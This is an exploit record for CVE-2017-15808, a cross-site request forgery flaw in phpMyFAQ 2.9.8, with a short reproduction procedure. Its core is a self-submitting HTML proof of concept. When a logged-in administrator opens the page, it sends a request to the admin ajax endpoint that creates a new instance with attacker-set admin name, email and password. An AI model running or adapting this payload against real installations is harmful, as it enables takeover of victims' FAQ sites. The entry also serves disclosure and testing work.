phpMyFaq 2.9.8 Exploit, Cross Site Request Forgery (CSRF)

# Exploit Title: phpMyFaq 2.9.8 - Cross Site Request Forgery (CSRF)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
# Software Link: https://github.com/thorsten/phpMyFAQ/
# Version: 2.9.8
# Tested on: Windows 10
# CVE : CVE-2017-15808


PoC:
<html>
  <body>
    <form action="http://phpmyfaq/admin/index.php" method="GET">
      <input type="hidden" name="action" value="ajax">
      <input type="hidden" name="ajax" value="config">
      <input type="hidden" name="ajaxaction" value="add_instance">
      <input type="hidden" name="url" value="malicious">
      <input type="hidden" name="instance" value="malicious_instance">
      <input type="hidden" name="comment" value="CSRF Test">
      <input type="hidden" name="email" value="attacker@example.com">
      <input type="hidden" name="admin" value="attacker">
      <input type="hidden" name="password" value="password123">
      <input type="submit" value="Submit request">
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Steps to Reproduce:
1. Save the following code as poc.html.
2. Log in phpmyfaq, and open the file in the same browser.
3. The outcome will occur.

All rights reserved nPulse.net 2009 - 2025
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD